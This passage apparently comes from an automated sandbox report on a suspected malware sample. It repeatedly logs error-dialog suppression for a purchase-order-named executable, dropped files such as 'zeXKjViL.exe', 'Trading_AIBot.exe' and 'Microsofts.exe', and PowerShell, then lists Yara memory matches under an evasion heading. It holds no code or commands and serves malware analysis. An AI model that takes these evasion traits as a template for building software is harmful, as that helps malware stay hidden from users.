                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeProcess information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          barindex
                          Source: Yara matchFile source: Process Memory Space: PO_2024_056209_MQ04865_ENQ_1045.exe PID: 7708, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: zeXKjViL.exe PID: 7272, type: MEMORYSTR
